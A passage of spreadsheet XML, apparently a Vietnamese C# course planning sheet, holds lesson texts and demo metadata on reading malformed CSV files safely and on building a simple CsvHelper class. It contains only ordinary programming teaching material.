- Mỗi dấu `"` bên trong trường phải nhân đôi thành `""` trước khi bọc.
- Thứ tự đúng là: kiểm tra, nhân đôi nháy, rồi bọc nháy kép.
- Áp dụng `EscapeCsv` cho từng trường, rồi mới nối bằng dấu phẩy.
- Trường không có ký tự đặc biệt được giữ nguyên.</t>
        </is>
      </c>
    </row>
    <row r="51" ht="409.6" customHeight="1" s="18">
      <c r="A51" s="10" t="n">
        <v>51</v>
      </c>
      <c r="B51" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C51" s="10" t="inlineStr">
        <is>
          <t>Xử lý CSV nâng cao và Ứng dụng thực tế</t>
        </is>
      </c>
      <c r="D51" s="10" t="inlineStr">
        <is>
          <t>Xử lý các trường hợp đặc biệt và lỗi trong CSV</t>
        </is>
      </c>
      <c r="E51" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F51" s="11" t="inlineStr">
        <is>
          <t>Nên làm</t>
        </is>
      </c>
      <c r="G51" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H51" s="10" t="inlineStr">
        <is>
          <t>Đọc một tệp CSV 'bẩn' mà không sập: giữ bản ghi hợp lệ và báo lỗi kèm số dòng.</t>
        </is>
      </c>
      <c r="I51" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J51" s="10" t="inlineStr">
        <is>
          <t>Trình xem tệp; mỗi dòng đi qua các kiểm tra (dòng trống? đủ 3 cột? giá là số?). Hai thùng bên dưới: Hợp lệ (thẻ xanh) và Lỗi (thẻ đỏ ghi số dòng và lý do).</t>
        </is>
      </c>
      <c r="K51" s="10" t="inlineStr">
        <is>
          <t>H12, H09, H21</t>
        </is>
      </c>
      <c r="L51" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M51" s="10" t="inlineStr">
        <is>
          <t>Dòng 1: tiêu đề, bỏ qua.
Dòng 2 SP01,Bút,5000 → hợp lệ.
Dòng 3 trống → bỏ qua (không tính lỗi).
Dòng 4 SP02,Vở → thiếu cột → thùng Lỗi: "Dòng 4: cần 3 cột, có 2".
Dòng 5 SP03,Thước,abc → giá không phải số → thùng Lỗi: "Dòng 5: giá không hợp lệ".
Dòng 6 SP04,Tẩy,3000 → hợp lệ. Xong: 2 hợp lệ, 2 lỗi.</t>
        </is>
      </c>
      <c r="N51" s="10" t="inlineStr">
        <is>
          <t>6 dòng như kịch bản</t>
        </is>
      </c>
      <c r="O51" s="10" t="inlineStr">
        <is>
          <t>Không để một dòng hỏng làm hỏng cả tệp; ghi lại số dòng để người dùng sửa.</t>
        </is>
      </c>
      <c r="P51" s="10" t="n"/>
      <c r="Q51" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xu-ly-cac-truong-hop-dac-biet-va-loi-trong-csv/index.html</t>
        </is>
      </c>
      <c r="R51" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xu-ly-cac-truong-hop-dac-biet-va-loi-trong-csv/</t>
        </is>
      </c>
      <c r="S51" s="10" t="n"/>
      <c r="T51" s="12" t="n"/>
      <c r="U51" s="12" t="n"/>
      <c r="V51" s="21" t="inlineStr">
        <is>
          <t>Nhận diện các Trường hợp CSV "Không Chuẩn"
Trong thế giới lý tưởng, mọi tệp CSV đều tuân thủ nghiêm ngặt các quy tắc định dạng, với số lượng trường nhất quán, dấu phân cách rõ ràng và không có dữ liệu bất thường. Tuy nhiên, thực tế thường phức tạp hơn nhiều. Khi làm việc với dữ liệu CSV từ nhiều nguồn khác nhau, bạn sẽ thường xuyên gặp phải các tệp "không chuẩn" hoặc chứa các yếu tố có thể gây lỗi. Việc nhận diện và có chiến lược xử lý các trường hợp này là rất quan trọng để đảm bảo tính ổn định và chính xác cho ứng dụng của bạn.
Dưới đây là một số trường hợp phổ biến:
Dòng trống (Empty Lines)
Rất nhiều tệp CSV có thể chứa các dòng hoàn toàn trống, thường là do lỗi khi xuất dữ liệu hoặc do người dùng thêm vào. Nếu không được xử lý, các dòng này có thể gây ra lỗi khi bạn cố gắng phân tích chúng thành các trường dữ liệu.
Cách nhận diện: Một dòng không chứa bất kỳ ký tự nào, hoặc chỉ chứa các ký tự khoảng trắng (space, tab).
Chiến lược xử lý: Luôn kiểm tra xem một dòng có rỗng hoặc chỉ chứa khoảng trắng trước khi cố gắng phân tích nó. Nếu rỗng, bạn nên bỏ qua dòng đó.
Dòng comment (Comment Lines)
Một số tệp CSV có thể bao gồm các dòng comment, thường bắt đầu bằng một ký tự đặc biệt như #, //, hoặc thậm chí là ;. Các dòng này thường chứa thông tin mô tả về dữ liệu hoặc nguồn gốc của tệp, và không phải là dữ liệu thực tế cần được xử lý.
Cách nhận diện: Dòng bắt đầu bằng một ký tự hoặc chuỗi ký tự được quy ước là dấu comment.
Chiến lược xử lý: Khi đọc từng dòng, hãy kiểm tra xem nó có bắt đầu bằng dấu comment đã biết hay không. Nếu có, bỏ qua dòng đó. Bạn có thể cần một danh sách các tiền tố comment có thể có, tùy thuộc vào nguồn dữ liệu.
Dấu phân cách không chuẩn hoặc không nhất quán
Mặc dù dấu phẩy (,) là dấu phân cách phổ biến nhất cho CSV, nhưng không phải lúc nào cũng vậy. Một số tệp có thể sử dụng dấu chấm phẩy (;), dấu tab (\t), hoặc thậm chí là dấu gạch đứng (|). Vấn đề trở nên phức tạp hơn khi một tệp sử dụng nhiều dấu phân cách khác nhau hoặc khi dấu phân cách xuất hiện trong chính dữ liệu mà không được bao quanh bởi dấu nháy kép đúng cách.
Cách nhận diện:
Kiểm tra các dòng đầu tiên của tệp để xác định dấu phân cách chủ đạo.
Nếu bạn đang sử dụng một thư viện CSV, nó thường có tùy chọn để chỉ định dấu phân cách.
Nếu dấu phân cách xuất hiện trong dữ liệu mà không có dấu nháy kép, điều này thường dẫn đến số lượng trường không khớp.
Chiến lược xử lý:
Cố gắng đoán dấu phân cách dựa trên các dòng đầu tiên hoặc cung cấp một tùy chọn cấu hình cho người dùng để chỉ định dấu phân cách.
Sử dụng một thư viện CSV mạnh mẽ, có khả năng xử lý các trường hợp phức tạp như dấu phân cách trong dữ liệu được bao quanh bởi dấu nháy kép.
Dữ liệu bị lỗi định dạng trong trường
Đôi khi, các trường dữ liệu cá nhân có thể chứa lỗi định dạng, đặc biệt là liên quan đến dấu nháy kép. Ví dụ, một trường có thể có dấu nháy kép mở nhưng không có dấu đóng, hoặc có dấu nháy kép thừa.
Cách nhận diện: Thường dẫn đến lỗi phân tích cú pháp từ thư viện CSV, hoặc số lượng trường không khớp.
Chiến lược xử lý: Các thư viện CSV chuyên dụng thường có khả năng xử lý tốt hơn các trường hợp này bằng cách cố gắng sửa chữa hoặc bỏ qua các trường bị lỗi. Nếu tự viết parser, bạn sẽ cần logic phức tạp để xử lý các dấu nháy kép không cân bằng.
Xử lý Lỗi Số Lượng Trường Không Khớp
Một trong những vấn đề phổ biến và khó chịu nhất khi xử lý CSV là khi số lượng trường (cột) không nhất quán giữa các dòng. Điều này có thể xảy ra vì nhiều lý do:
Dòng tiêu đề (header) và dòng dữ liệu không khớp: Dòng tiêu đề có thể có một số lượng cột nhất định, nhưng các dòng dữ liệu lại có số lượng cột khác.
Các dòng dữ liệu không nhất quán: Một số dòng dữ liệu có thể có nhiều cột hơn hoặc ít cột hơn so với phần còn lại của tệp. Điều này thường do lỗi nhập liệu, xuất dữ liệu không đúng cách, hoặc do dữ liệu chứa dấu phân cách mà không được xử lý bằng dấu nháy kép.
Hậu quả của số lượng trường không khớp
Lỗi phân tích cú pháp: Nếu bạn đang ánh xạ dữ liệu CSV vào một đối tượng C# với số lượng thuộc tính cố định, hoặc truy cập các trường theo chỉ mục, việc không khớp số lượng trường sẽ gây ra lỗi IndexOutOfRangeException hoặc FormatException.
Dữ liệu sai lệch: Nếu lỗi không được bắt, dữ liệu có thể được gán sai vào các thuộc tính không mong muốn, dẫn đến thông tin không chính xác.
Ứng dụng bị dừng đột ngột: Nếu không có cơ chế xử lý lỗi, ứng dụng của bạn có thể gặp sự cố và dừng hoạt động.
Chiến lược xử lý
Để giải quyết vấn đề này, bạn cần một chiến lược kiểm tra và xử lý mạnh mẽ:
Xác định số lượng trường chuẩn:
Nếu tệp CSV có dòng tiêu đề, hãy phân tích dòng đó trước để xác định số lượng trường dự kiến.
Nếu không có dòng tiêu đề, bạn có thể lấy số lượng trường từ dòng dữ liệu đầu tiên (không phải dòng comment hoặc dòng trống) làm chuẩn.
Kiểm tra từng dòng dữ liệu:
Sau khi phân tích mỗi dòng, hãy so sánh số lượng trường thực tế của dòng đó với số lượng trường chuẩn đã xác định.
Sử dụng một thư viện CSV sẽ giúp bạn có được số lượng trường một cách dễ dàng.
Các hành động khi phát hiện lỗi:
Bỏ qua dòng lỗi: Đây là cách đơn giản nhất. Ghi lại thông báo lỗi và số dòng để kiểm tra sau, sau đó tiếp tục xử lý các dòng khác.
Ghi log lỗi chi tiết: Ghi lại dòng dữ liệu bị lỗi, số dòng, và loại lỗi vào một tệp log để người dùng hoặc quản trị viên có thể xem xét và sửa chữa thủ công.
Ném ngoại lệ (Exception): Nếu tính toàn vẹn của dữ liệu là cực kỳ quan trọng và bạn không thể chấp nhận bất kỳ dòng lỗi nào, bạn có thể ném một ngoại lệ tùy chỉnh để dừng quá trình xử lý và thông báo cho người dùng.
Áp dụng try-catch để Bắt Lỗi và Ngoại lệ
Trong quá trình đọc và ghi dữ liệu CSV, có rất nhiều yếu tố bên ngoài có thể gây ra lỗi hoặc ngoại lệ. Ví dụ: tệp không tồn tại, không có quyền truy cập, lỗi định dạng dữ liệu, hoặc các vấn đề về I/O. Để xây dựng một ứng dụng C# mạnh mẽ và ổn định, việc sử dụng cấu trúc try-catch là điều cần thiết để xử lý các ngoại lệ này một cách duyên dáng.
Bạn đã được giới thiệu chi tiết về cách hoạt động của try-catch trong module Exception Handling. Giờ đây, chúng ta sẽ áp dụng kiến thức đó vào ngữ cảnh xử lý CSV.
Các loại ngoại lệ thường gặp
Khi làm việc với CSV, bạn có thể gặp các loại ngoại lệ sau:
FileNotFoundException: Xảy ra khi tệp CSV bạn cố gắng đọc không tồn tại tại đường dẫn đã chỉ định.
UnauthorizedAccessException: Xảy ra khi ứng dụng không có quyền đọc hoặc ghi vào tệp CSV.
IOException: Một ngoại lệ chung cho các lỗi liên quan đến hoạt động nhập/xuất tệp (ví dụ: tệp đang được một chương trình khác sử dụng).
FormatException: Xảy ra khi bạn cố gắng chuyển đổi một trường dữ liệu từ chuỗi sang một kiểu dữ liệu khác (ví dụ: int, DateTime) nhưng định dạng của chuỗi không hợp lệ.
IndexOutOfRangeException: Xảy ra khi bạn cố gắng truy cập một trường dữ liệu bằng chỉ mục (ví dụ: record[5]) nhưng chỉ mục đó vượt quá số lượng trường hiện có trong dòng.
Ví dụ về try-catch khi đọc CSV
Giả sử bạn đang đọc một tệp CSV và chuyển đổi các trường thành các kiểu dữ liệu cụ thể. Bạn có thể sử dụng try-catch để bắt các lỗi tiềm ẩn.
using System;
using System.IO;
using System.Linq;
using System.Collections.Generic;
public class CsvProcessor
{
    public static void ProcessCsvFile(string filePath)
    {
        try
        {
            // Kiểm tra xem tệp có tồn tại không
            if (!File.Exists(filePath))
            {
                Console.WriteLine($"Lỗi: Tệp '{filePath}' không tìm thấy.");
                return;
            }
            // Đọc tất cả các dòng từ tệp
            string[] lines = File.ReadAllLines(filePath);
            int lineNumber = 0;
            foreach (string line in lines)
            {
                lineNumber++;
                // Bỏ qua dòng trống hoặc dòng comment
                if (string.IsNullOrWhiteSpace(line) || line.StartsWith("#"))
                {
                    Console.WriteLine($"Bỏ qua dòng {lineNumber} (trống hoặc comment).");
                    continue;
                }
                try
                {
                    // Giả sử dấu phân cách là dấu phẩy
                    string[] fields = line.Split(',');
                    // Kiểm tra số lượng trường không khớp
                    // Giả định dòng đầu tiên (không comment/trống) thiết lập số lượng trường chuẩn
                    // Trong ứng dụng thực tế, bạn sẽ xác định headers trước
                    if (lineNumber == 1 &amp;&amp; lines.Length &gt; 1) // Chỉ làm điều này cho dòng header hoặc dòng dữ liệu đầu tiên
                    {
                        // Lưu số lượng trường chuẩn từ dòng đầu tiên
                        // (Bạn cần một biến cấp lớp hoặc truyền tham số để lưu trữ số lượng trường chuẩn)
                        // Ví dụ: int expectedFieldCount = fields.Length;
                    }
                    else if (fields.Length != 3) // Giả sử chúng ta mong đợi 3 trường cho dữ liệu
                    {
                        Console.WriteLine($"Cảnh báo: Dòng {lineNumber} có số lượng trường không khớp ({fields.Length} thay vì 3). Dòng: '{line}'");
                        continue; // Bỏ qua dòng này hoặc xử lý lỗi khác
                    }
                    // Cố gắng phân tích các trường dữ liệu
                    // Ví dụ: field[0] là string, field[1] là int, field[2] là double
                    string name = fields[0];
                    int age = int.Parse(fields[1]); // Có thể ném FormatException
                    double score = double.Parse(fields[2]); // Có thể ném FormatException
                    Console.WriteLine($"Dòng {lineNumber}: Tên: {name}, Tuổi: {age}, Điểm: {score}");
                }
                catch (IndexOutOfRangeException ex)
                {
                    Console.WriteLine($"Lỗi định dạng dòng {lineNumber}: Không đủ trường. {ex.Message}. Dòng: '{line}'");
                }
                catch (FormatException ex)
                {
                    Console.WriteLine($"Lỗi chuyển đổi kiểu dữ liệu dòng {lineNumber}: {ex.Message}. Dòng: '{line}'");
                }
                catch (Exception ex) // Bắt các ngoại lệ khác không lường trước được
                {
                    Console.WriteLine($"Lỗi không xác định khi xử lý dòng {lineNumber}: {ex.Message}. Dòng: '{line}'");
                }
            }
        }
        catch (FileNotFoundException ex)
        {
            Console.WriteLine($"Lỗi hệ thống: Tệp không tìm thấy. {ex.Message}");
        }
        catch (UnauthorizedAccessException ex)
        {
            Console.WriteLine($"Lỗi hệ thống: Không có quyền truy cập tệp. {ex.Message}");
        }
        catch (IOException ex)
        {
            Console.WriteLine($"Lỗi hệ thống: Lỗi I/O khi đọc tệp. {ex.Message}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"Lỗi không mong muốn xảy ra: {ex.Message}");
        }
    }
    // Để chạy ví dụ này, bạn có thể tạo một tệp test.csv
    // Ví dụ nội dung test.csv:
    // Tên,Tuổi,Điểm
    // Alice,30,95.5
    // Bob,24,88.0
    // Charlie,abc,75.0  &lt;-- Lỗi FormatException
    // David,28           &lt;-- Lỗi IndexOutOfRangeException (thiếu trường)
    // # Đây là một dòng comment
    //
    // Eve,35,92.1
    // Frank,40,90.0,extra &lt;-- Lỗi số lượng trường không khớp (thừa trường)
}
Trong ví dụ trên:
Khối try bên ngoài bao quanh toàn bộ quá trình đọc tệp để bắt các lỗi liên quan đến tệp (không tìm thấy, quyền truy cập, I/O).
Vòng lặp foreach duyệt qua từng dòng.
Bên trong vòng lặp, một khối try khác được sử dụng để bắt các lỗi cụ thể xảy ra trong quá trình xử lý từng dòng, như lỗi IndexOutOfRangeException (khi số lượng trường không đủ) hoặc FormatException (khi chuyển đổi kiểu dữ liệu).
Các khối catch cụ thể cho phép bạn xử lý từng loại lỗi một cách riêng biệt, cung cấp thông báo lỗi rõ ràng và có thể thực hiện các hành động khôi phục hoặc ghi log phù hợp.
Việc áp dụng try-catch một cách có hệ thống giúp ứng dụng của bạn không chỉ chạy ổn định hơn mà còn cung cấp thông tin hữu ích khi có lỗi xảy ra, giúp bạn dễ dàng gỡ lỗi và cải thiện chất lượng dữ liệu.</t>
        </is>
      </c>
      <c r="W51" s="22" t="inlineStr">
        <is>
          <t># Xử lý các trường hợp đặc biệt và lỗi trong CSV
## Mục tiêu học tập
Sau bài học này, bạn có thể:
- Nhận diện các tệp CSV "không chuẩn": dòng trống, dòng comment, thiếu hoặc thừa cột, giá trị sai kiểu.
- Phân biệt dòng cần bỏ qua (như dòng trống) với dòng lỗi cần báo cáo.
- Viết vòng lặp đọc CSV kiểm tra từng dòng, giữ dòng hợp lệ và ghi lại lỗi kèm số dòng.
- Dùng `int.TryParse` thay cho `int.Parse` để tránh `FormatException` khi dữ liệu bẩn.
- Quan sát từng dòng của một tệp bẩn được kiểm tra bằng hoạt động mô phỏng.
## Tệp CSV ngoài đời không "sạch"
Trong sách vở, mọi dòng CSV đều đủ cột và đúng kiểu. Trong thực tế, dữ liệu đến từ nhiều nguồn: người nhập tay, xuất từ phần mềm khác, chỉnh sửa bằng bảng tính. Những vấn đề thường gặp:
| Tình huống | Cách nhận ra | Cách xử lý |
|---|---|---|
| **Dòng trống** | `line.Trim() == ""` | Bỏ qua, không phải lỗi |
| **Dòng comment** | Bắt đầu bằng ký tự quy ước như `#` | Bỏ qua |
| **Sai số cột** | Số phần sau khi tách khác số cột mong đợi | Ghi lỗi kèm số dòng, đọc tiếp |
| **Sai kiểu dữ liệu** | `int.TryParse` trả về `false` | Ghi lỗi kèm số dòng, đọc tiếp |
| **Dấu phân cách khác** | Dòng đầu dùng `;`, tab hoặc `\|` | Cấu hình đúng dấu phân cách khi đọc |
| **Nháy kép không cân bằng** | Số cột lệch bất thường | Dùng bộ phân tích chuẩn, ghi lỗi |
Nếu không xử lý, chỉ một dòng hỏng cũng có thể làm chương trình dừng giữa chừng hoặc nạp dữ liệu sai vào đối tượng.
## Bỏ qua hay báo lỗi?
Không phải dòng bất thường nào cũng là lỗi:
- **Bỏ qua im lặng:** dòng trống, dòng comment. Chúng không chứa dữ liệu nên không cần báo.
- **Báo lỗi:** dòng có dữ liệu nhưng sai: thiếu cột, thừa cột, giá không phải số. Người dùng cần biết để sửa.
Khi báo lỗi, hãy luôn kèm **số dòng** và **lý do**. Một thông báo như `Dòng 4: cần 3 cột, có 2` giúp người dùng mở tệp và sửa đúng chỗ.
Bạn có ba lựa chọn khi gặp dòng lỗi:
1. **Ghi lại rồi đọc tiếp** (phổ biến nhất): giữ các dòng tốt, gom lỗi vào một danh sách để báo sau.
2. **Ghi log chi tiết** vào tệp để người quản trị xem lại.
3. **Dừng và ném ngoại lệ**, khi dữ liệu bắt buộc phải hoàn toàn đúng.
## Đọc tệp CSV bẩn không bị sập
Giả sử tệp `sp.csv` có 6 dòng, trong đó có dòng trống, dòng thiếu cột và dòng sai giá:
```
Ma,Ten,Gia
SP01,Bút,5000
SP02,Vở
SP03,Thước,abc
SP04,Tẩy,3000
```
Chương trình dưới đây tạo tệp, rồi đọc với các kiểm tra theo thứ tự: dòng trống, đủ 3 cột, giá là số.
```csharp
using System;
using System.Collections.Generic;
using System.IO;
public class Product
{
    public string Ma { get; }
    public string Ten { get; }
    public int Gia { get; }
    public Product(string ma, string ten, int gia)
    {
        Ma = ma;
        Ten = ten;
        Gia = gia;
    }
}
public class Program
{
    public static void Main()
    {
        string path = "sp.csv";
        File.WriteAllLines(path, new[]
        {
            "Ma,Ten,Gia", "SP01,Bút,5000", "", "SP02,Vở", "SP03,Thước,abc", "SP04,Tẩy,3000"
        });
        var good = new List&lt;Product&gt;();
        var bad = new List&lt;string&gt;();
        try
        {
            string[] rows = File.ReadAllLines(path);
            for (int i = 1; i &lt; rows.Length; i++)   // i = 1: bỏ dòng tiêu đề
            {
                string line = rows[i];
                if (line.Trim() == "")
                {
                    continue;   // dòng trống: bỏ qua, không phải lỗi
                }
                var p = line.Split(',');
                if (p.Length != 3)
                {
                    bad.Add("Dòng " + (i + 1) + ": cần 3 cột, có " + p.Length);
                    continue;
                }
                if (!int.TryParse(p[2], out int gia))
                {
                    bad.Add("Dòng " + (i + 1) + ": giá không hợp lệ");
                    continue;
                }
                good.Add(new Product(p[0], p[1], gia));
            }
        }
        catch (FileNotFoundException)
        {
            Console.WriteLine("Không tìm thấy tệp " + path);
        }
        catch (IOException ex)
        {
            Console.WriteLine("Lỗi đọc tệp: " + ex.Message);
        }
        Console.WriteLine("Hợp lệ: " + good.Count);   // Hợp lệ: 2
        Console.WriteLine("Lỗi: " + bad.Count);       // Lỗi: 2
        foreach (string msg in bad)
        {
            Console.WriteLine(msg);
        }
        // Dòng 4: cần 3 cột, có 2
        // Dòng 5: giá không hợp lệ
    }
}
```
Một vài điểm cần chú ý:
- `i + 1` là **số dòng trong tệp** (dòng 1 là tiêu đề), nên thông báo lỗi trùng với số dòng bạn thấy khi mở tệp.
- `int.TryParse` trả về `true` hoặc `false` thay vì ném `FormatException`, nên một giá trị sai không làm sập vòng lặp.
- `try-catch` bên ngoài lo các lỗi về tệp: `FileNotFoundException` (không có tệp), `UnauthorizedAccessException` (không có quyền) và `IOException` (lỗi nhập/xuất, ví dụ tệp đang bị chương trình khác dùng). Thứ tự `catch` phải đi từ lỗi cụ thể đến lỗi chung, vì `FileNotFoundException` là lớp con của `IOException`.
- Kiểm tra số cột trước khi truy cập `p[2]`, để tránh `IndexOutOfRangeException`.
## Hoạt động: Đọc tệp CSV bẩn
Mô phỏng dưới đây chạy đoạn code trên với tệp `sp.csv` gồm 6 dòng. Hãy thao tác theo thứ tự sau, bấm **Bước tiếp** để chạy từng dòng:
- Mở tab **Tệp CSV bẩn**. Bước đầu, `ReadAllLines` đọc 6 dòng (`rows.Length` là 6). Vòng `for` bắt đầu từ `i = 1` nên dòng tiêu đề `Ma,Ten,Gia` bị bỏ qua và được làm mờ.
- Dòng 2 `SP01,Bút,5000`: không trống, đủ 3 cột, giá là số, nên được thêm vào thùng **Hợp lệ** (mục mới màu xanh).
- Dòng 3 là dòng trống: `continue`, bỏ qua luôn. Dòng này làm mờ và không vào thùng **Lỗi**, vì đây không phải lỗi.
- Dòng 4 `SP02,Vở`: `Split` chỉ cho 2 phần, kiểm tra "Đủ 3 cột?" chuyển đỏ, thùng **Lỗi** nhận thông báo `Dòng 4: cần 3 cột, có 2`.
- Dòng 5 `SP03,Thước,abc`: qua được hai kiểm tra đầu nhưng kiểm tra "Giá là số?" thất bại vì `TryParse("abc")` trả về `false`. Thùng **Lỗi** nhận `Dòng 5: giá không hợp lệ`. Chương trình vẫn chạy tiếp, không sập.
- Dòng 6 `SP04,Tẩy,3000` hợp lệ nên vào thùng **Hợp lệ**. Kết quả cuối: 2 dòng hợp lệ và 2 dòng lỗi, mỗi lỗi có số dòng để người dùng tự sửa.
```
&lt;iframe src="https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xu-ly-cac-truong-hop-dac-biet-va-loi-trong-csv/" title="Đọc CSV bẩn mà không sập" style="border:0;" allowfullscreen&gt;&lt;/iframe&gt;
```
Điều rút ra: đừng để một dòng hỏng làm hỏng cả tệp. Kiểm tra từng dòng, giữ dòng tốt, ghi lại lỗi kèm số dòng để người dùng sửa.
## Lưu ý về `Split(',')`
Ví dụ trên dùng `Split(',')` cho gọn, nên chỉ đúng với dữ liệu không có dấu phẩy hoặc nháy kép trong trường. Nếu dữ liệu có thể chứa chúng, hãy dùng bộ phân tích theo trạng thái (bài "Xử lý các trường có dấu nháy kép và dấu phân cách đặc biệt") hoặc một thư viện CSV chuyên dụng.
## Tóm tắt
- Tệp CSV thực tế có thể có dòng trống, dòng comment, sai số cột và sai kiểu dữ liệu.
- Dòng trống và comment thì bỏ qua; dòng có dữ liệu nhưng sai thì ghi lỗi kèm số dòng.
- Kiểm tra số cột trước khi truy cập theo chỉ số, và dùng `int.TryParse` để tránh `FormatException`.
- Dùng `try-catch` bên ngoài cho lỗi tệp như `FileNotFoundException`, `UnauthorizedAccessException`, `IOException`.
- Mục tiêu là đọc hết tệp, giữ lại phần hợp lệ và báo đủ lỗi, thay vì dừng ở dòng hỏng đầu tiên.</t>
        </is>
      </c>
    </row>
    <row r="52" ht="409.6" customHeight="1" s="18">
      <c r="A52" s="10" t="n">
        <v>52</v>
      </c>
      <c r="B52" s="10" t="inlineStr">
        <is>
          <t>5. Làm việc với Dữ liệu có Cấu trúc (CSV)</t>
        </is>
      </c>
      <c r="C52" s="10" t="inlineStr">
        <is>
          <t>Xử lý CSV nâng cao và Ứng dụng thực tế</t>
        </is>
      </c>
      <c r="D52" s="10" t="inlineStr">
        <is>
          <t>Xây dựng một lớp CsvHelper đơn giản</t>
        </is>
      </c>
      <c r="E52" s="10" t="inlineStr">
        <is>
          <t>Bài đọc</t>
        </is>
      </c>
      <c r="F52" s="13" t="inlineStr">
        <is>
          <t>Làm thêm nếu muốn</t>
        </is>
      </c>
      <c r="G52" s="16" t="inlineStr">
        <is>
          <t>Done</t>
        </is>
      </c>
      <c r="H52" s="10" t="inlineStr">
        <is>
          <t>Thấy lợi ích gom code đọc/ghi CSV vào một lớp: ghi rồi đọc lại phải ra đúng dữ liệu (round-trip).</t>
        </is>
      </c>
      <c r="I52" s="10" t="inlineStr">
        <is>
          <t>1 cột</t>
        </is>
      </c>
      <c r="J52" s="10" t="inlineStr">
        <is>
          <t>Hộp lớp CsvHelper (ToCsvLine, ParseLine) ở trên; dưới là vòng tròn: đối tượng → dòng CSV → đối tượng mới; bảng so sánh từng trường với dấu ✓.</t>
        </is>
      </c>
      <c r="K52" s="10" t="inlineStr">
        <is>
          <t>H17, H19</t>
        </is>
      </c>
      <c r="L52" s="10" t="inlineStr">
        <is>
          <t>1 tab</t>
        </is>
      </c>
      <c r="M52" s="10" t="inlineStr">
        <is>
          <t>Product gốc: SP09, Bút, mực "đỏ", 15000.
CsvHelper.ToCsvLine → SP09,"Bút, mực ""đỏ""",15000.
CsvHelper.ParseLine → Product mới.
So sánh từng trường: Ma ✓, Ten ✓, Gia ✓.
Xong.</t>
        </is>
      </c>
      <c r="N52" s="10" t="inlineStr">
        <is>
          <t>Product SP09</t>
        </is>
      </c>
      <c r="O52" s="10" t="inlineStr">
        <is>
          <t>Một lớp, hai chiều, kiểm tra bằng round-trip: ghi rồi đọc lại phải giống ban đầu.</t>
        </is>
      </c>
      <c r="P52" s="10" t="n"/>
      <c r="Q52" s="10" t="inlineStr">
        <is>
          <t>c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xay-dung-mot-lop-csvhelper-don-gian/index.html</t>
        </is>
      </c>
      <c r="R52" s="10" t="inlineStr">
        <is>
          <t>https://codegym-vn.github.io/programming-course-demos/c-sharp-ung-dung/lam-viec-voi-du-lieu-co-cau-truc-csv/xu-ly-csv-nang-cao-va-ung-dung-thuc-te/xay-dung-mot-lop-csvhelper-don-gian/</t>
        </is>
      </c>
      <c r="S52" s="10" t="n"/>
      <c r="T52" s="12" t="n"/>
      <c r="U52" s="12" t="n"/>
      <c r="V52" s="21" t="inlineStr">
        <is>
          <t>Xây dựng lớp hỗ trợ CSV (CsvHelper) tùy chỉnh
Trong các bài học trước, chúng ta đã làm quen với việc đọc/ghi tệp CSV bằng các phương thức xử lý chuỗi cơ bản. Tuy nhiên, khi dự án của bạn phát triển, việc rải rác các dòng code File.ReadAllLines hay Split(',') trên khắp ứng dụng sẽ khiến mã nguồn trở nên khó bảo trì và dễ phát sinh lỗi. Để giải quyết vấn đề này, việc đóng gói các logic xử lý vào một lớp CsvHelper chuyên dụng là bước đi cần thiết.
Tại sao cần xây dựng lớp bao (Wrapper Class)?
Việc tạo một lớp riêng không chỉ giúp mã nguồn của bạn trở nên chuyên nghiệp hơn mà còn mang lại những lợi ích cụ thể:
Tính trừu tượng: Người sử dụng không cần quan tâm đến cơ chế tách dòng hay xử lý dấu phân cách, chỉ cần gọi các phương thức như Read() hoặc Write().
Tính nhất quán: Đảm bảo tất cả các tệp CSV trong hệ thống được đọc/ghi theo cùng một cấu hình (ví dụ: cùng ký tự phân cách, cùng chuẩn encoding).
Khả năng mở rộng: Dễ dàng bổ sung tính năng kiểm tra lỗi (validation) hoặc ghi log mà không làm ảnh hưởng đến logic nghiệp vụ của ứng dụng.
Cấu trúc cơ bản của CsvHelper
Dưới đây là một khung sườn (skeleton) cơ bản cho lớp CsvHelper của bạn. Thay vì chỉ xử lý dữ liệu thô, lớp này sẽ giúp quản lý tệp và cung cấp các phương thức thao tác an toàn hơn.
using System.IO;
using System.Collections.Generic;
public class SimpleCsvHelper
{
    private readonly string _filePath;
    private readonly char _delimiter;
    public SimpleCsvHelper(string filePath, char delimiter = ',')
    {
        _filePath = filePath;
        _delimiter = delimiter;
    }
    public List&lt;string[]&gt; ReadAllData()
    {
        var result = new List&lt;string[]&gt;();
        if (!File.Exists(_filePath)) return result;
        foreach (var line in File.ReadLines(_filePath))
        {
            // Sử dụng logic tách chuỗi an toàn đã học ở bài trước
            result.Add(line.Split(_delimiter));
        }
        return result;
    }
    public void WriteAllData(IEnumerable&lt;string[]&gt; data)
    {
        using (StreamWriter sw = new StreamWriter(_filePath))
        {
            foreach (var row in data)
            {
                sw.WriteLine(string.Join(_delimiter, row));
            }
        }
    }
}
Nâng cấp: Chuyển đổi dữ liệu sang Đối tượng (Mapping)
Điểm mạnh nhất khi sử dụng lớp hỗ trợ tự viết là khả năng tự động hóa việc ánh xạ dữ liệu (mapping). Thay vì làm việc với mảng string[] gây nhầm lẫn, hãy biến dữ liệu CSV thành các đối tượng class hoặc struct trong C#.
Hãy xem ví dụ cách mở rộng CsvHelper để hỗ trợ kiểu dữ liệu danh sách:
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; }
    public decimal Price { get; set; }
}
// Bên trong lớp CsvHelper, ta có thể bổ sung phương thức:
public List&lt;Product&gt; ReadProducts()
{
    var products = new List&lt;Product&gt;();
    var data = ReadAllData();
    foreach (var row in data)
    {
        products.Add(new Product {
